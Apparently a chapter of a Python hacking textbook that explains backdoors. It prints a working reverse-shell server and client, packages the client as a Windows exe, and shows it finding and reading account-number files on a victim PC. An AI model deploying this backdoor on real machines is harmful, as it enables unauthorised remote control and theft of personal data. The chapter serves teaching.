24.1
The Basic Concept for a Backdoor
Figure 24-1 The Basic Concept for a Backdoor
A firewall blocks access to an internal server from the
outside, and services such as Telnet and FTP that provide access the server are
available only to authorized users. However, a firewall does not block the road
from the inside to the outside. It is hard to go inside of the firewall, but if
the invasion has been successful once, it then becomes easy to extract
information. A backdoor is a technique that bypasses security devices, such as
firewalls, to control server resources. A backdoor client installed on a server
performs commands sent from the backdoor server and passes the results back to
the backdoor server.
The most difficult task when hacking using a backdoor is
to install the backdoor on the client system. Since it is not difficult to
upload files directly through the network, hackers generally use a web
environment that has relatively weak security. The file upload functionality on
a bulletin board is most commonly used. Hackers upload a useful program or
video file that contains malicious code on a bulletin board, and users
inadvertently click and download the file. The moment the user clicks on the
file, the backdoor client will be installed on the PC without the users knowledge. The PC then becomes a
zombie PC and can be remotely controlled.
An antivirus program installed on a PC can detect most
backdoors, and the hackers who want to access the powerful features of that
backdoor continue to write malicious code in a form that cannot be identified
by vaccine programs. Here, we can use a simple Python program to learn the
concept of a backdoor. This command can be used to retrieve personal
information stored on a PC and to check the risk that a backdoor can be
installed.
24.2 Backdoor
Program Development
Figure 24-2 Backdoor Behavior
A backdoor consists of communication between
a server and a client. The backdoor server runs in the hacker PC, and the
backdoor client runs on the server PC. First, the backdoor server is started at
the hacker PC, and then the backdoor client is installed on the server PC and
starts trying to connect to the server. The backdoor server may send a command
to the backdoor client, and it is therefore possible to perform various deadly
attacks, such as acquiring personal information, retrieving registry information,
or making changes to account passwords.
The vaccines that are currently installed on most
PCs, can detect and treat backdoors that use a simple structure. It requires a
high level of skill to develop a working backdoor program. Nevertheless, the
purpose of this book is to familiarize the reader with the concept, so we will
make a backdoor program with a simple structure.
from socket import *
HOST = '' #(1)
PORT = 11443 #(2)
s = socket(AF_INET,
SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) #(3)
s.bind((HOST, PORT))
s.listen(10) #(4)
conn, addr = s.accept()
print ‘Connected by’, addr
data = conn.recv(1024)
while 1:
command = raw_input("Enter
shell command or quit: ") #(5)
conn.send(command) #(6)
if command == "quit": break
data = conn.recv(1024) #(7)
print data
conn.close()
|
The structure of backdoor server is
surprisingly simple. The basic skeleton is a client/server architecture that
uses a socket. The client’s role is to simply execute commands that are
received from the server and send back the results. The behavior of the back
door server is as follows.
(1) Specifing the HOST:
Specify the other party's address for the socket connection. If the address is
specified as a space, it means that any client can connect to the host.
(2) Specifing the Port:
Specify the port used to connect with the client. In this case, the use of port
11443 is not reserved by the system.
(3) Setting Socket
Options: It is possible to set various options
to control the socket operation. There are three types of options, including
“SOL_SOCKET”, “IPPROTO_TCP”, “IPPROTO_IP”. “IPPROTO_TCP” sets the options
related to the TCP protocol, and “IPPROTO_IP” sets the option of the IP
protocol. Finally, “SOL_SOCKET” is used to set the most common options that are
associated with a socket. The “SO_REUSERADDR” option used here means that the
reuse address is already in use.
(4)
Specifing the Connection Queue Size: Specify the number of requests that
can be queued to connect to the server.
(5) Command Input: Run the input window to
receive commands that can be sent to the client.
(6) Command Transmission: Transmit the
command to the client.
(7)
Receiving Result: Receive the result of the command that was executed from
the backdoor client and print on the screen.
Let's create a backdoor client. First, we
need to be familiar with the concept of the “subprocess.Popen” class that
executs instructions received from the server. The backdoor client receives the
command from the server in text form and creates a process to run it. At this
time, the “subprocess.Popen” class supports functions that include process
creation, passing instructions, and delivering results to the backdoor client.
Figure 24-3 Popen Class Behavior
The
Popen class receives a variety of values that are passed as arguments, and it
contains a special asset called PIPE. PIPE is a temporary file for the
operating system that serves as a passage to transmit and receive data between
processes. Through the three PIPEs, Popen can accept data, pass output values,
and handle error messages.
import socket,subprocess
HOST = ‘169.254.69.62’ #(1)
PORT = 11443
s =
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('[*] Connection Established!')
while 1:
data = s.recv(1024) #(2)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE) #(3)
stdout_value = proc.stdout.read() +
proc.stderr.read() #(4)
s.send(stdout_value) #(5)
s.close()
|
The
backdoor client uses a socket to connect to a backdoor server and to receive a
command from the server. The command that is received is executed through the
Popen class and passes the result back to the backdoor server. Let's take a
look at the detailed operating procedures.
(1) Specifing the Server
IP and Port: Specify the IP of a backdoor server
and the port that is used for the connection.
(2) Receiving the
Command: Receive a command from the server.
Read the data 1,024 bytes at a time from the socket.
(3) Running the Command:
Through the Popen function, run the command passed from the server. Seamless
communication can be provided between the processes by generating a pipe that
handles the input, output, and error messages.
(4) Printing Result
through pipe: Print the results of the execution
and the error messages through the pipe.
(5)
Sending Results to the Server: Transmit the results of the commands that
were executed to the server through a socket.
Now,
the server and the client are ready to run the backdoor attack. Python is not
installed on all target servers, and if you want to run the Python application
on Windows without the Python environment, you need to convert a Python program
to a Windows executable file. Let’s learn how to change the Python program into
an exe file.
24.3
Creating Windows executable file
To
convert the Python program to a Windows executable file, you need to install
the relevant module. Access the following site “www.py2exe.org” and download
the “py2exe“ module. Select the download tab of the site and download the
“py2exe-0.6.9.win32-py2.7.exe” program. First, make a ”setup.py“ file to create
an executable file.
from distutils.core import setup
import py2exe
options = { #(1)
"bundle_files" : 1,
"compressed" : 1,
"optimize" : 2,
}
setup ( #(2)
console
= ["backdoorClient.py"],
options
= {"py2exe" : options},
zipfile
= None
)
|
To
create “setup.py”, you should understand the various options available. Let’s
name them option (1) and option (2). Let look at them one by one.
(1)
Options
• bundle_files: Determines bundling. [3: Do not bundle,
default], [2: Basic bundling], [1: Bundling up the Python interpreter]
• compressed:
Determines whether to compress the library archives. [1: compression], [2: no
compression]
• optimize: Determinse the code optimization. [0: no optimizing], [1: normal
optimization], [2: additional optimization]
(2) Option Items
• console: Code list to translate to a console executable
(list format)
• windows: Code list to translate to a Windows executable (list format),
which is used when converting through a GUI program.
• options: Specify options for compilation
• zipfile: Bundle modules required to run the program as a zip file. “None”
indicates only the executable.
When the “setup.py“ file has been created, we
can change the “backdoorClient.py” file into an executable file. Place the
“setup.py” file and the “backdoorClient.py” file together in the same
directory. Open a Command program in Windows and run the following command:
“python -u setup.py py2exe”.
Figure 24-4 Executable File Creation
You
can see that two folders were created as described above, and all other files
may be ignored. You just need the “backdoorClient.exe” file in the “dist” folder.
Even if the Python environment is not installed, you are ready to run the
backdoor program.
24.4
Searching for the Personal Information File
Figure 23-5 Searching a Personal Information File
First,
let us consider a kind of mistake that programmers easily commit. In order to develop
a
program that can handle user information, Programmer A saves a file containing
personal customer information to his PC. A backdoor program is distributed via
e-mail, and A commits the mistake of reading the email and installing the backdoor
program on his PC. In order to conduct a test under the above situation, save a
“testfile.txt” file to the “C:\test” folder in the server PC, and save the “backdoorClient.exe”
file in the “C:” directory.
Figure 23-6 testfile.txt
Run
the “backdoorServer.py” program in the hacker PC, and run the
“backdoorClient.exe” in the server PC. You can see the following results at the
console screen of the hacker PC, and you can see the IP and the connection
information for the backdoor.
Figure 24-7 Run the Backdoor Program
Now,
let's pass the command through the backdoor in the hacker PC. Windows has a
powerful file search function that is as good as that in UNIX. By searching for
a text file using a command to check for specific characters, we can search for
a file that contains account numbers.
Figure 24-8 Search Account Number
Windows provides a
powerful UI, but also supports text commands that have a somewhat restricted
functionality relative to those available for UNIX. The “findstr” command does
not support the ability to exclude certain directories, and cannot use
directory names that contain spaces as an option. Also, when an unauthorized
file is encountered, the program will crash. Therefore, many problems have to
be overcome. To avoid these drawbacks, let’s exclude the “Windows” and “Program
Files” directories for this test.
(1)
Lookup Directory
List: You
can view the list of directories and files through the “dir” command. Since we
are interested in directories only, find the “<DIR>” strings and print the
directories only. In the results for the “dir” command , “<DIR>” indicates
a “directory”.
(2)
Searching File Including
the Account Number: Search all directories except the “Windows” and “Program Files”
directory. Search for files with the “txt” extension and find a file that contains
“AccountNum” strings.
(3)
Opening File: By using the command “type
directory\filename”, you can open the file that contains the account number
from a remote location.
There are many limiatations to the
backdoor functionality examples that were shown above when applied for real
hacking. This simply runs a command and displays output, but diverse hacking
attacks are impossible. However, it is well worth taking a look at the basic
concepts of a backdoor. Let's now discuss the dangers of system hacking through
various attacks.
No comments:
Post a Comment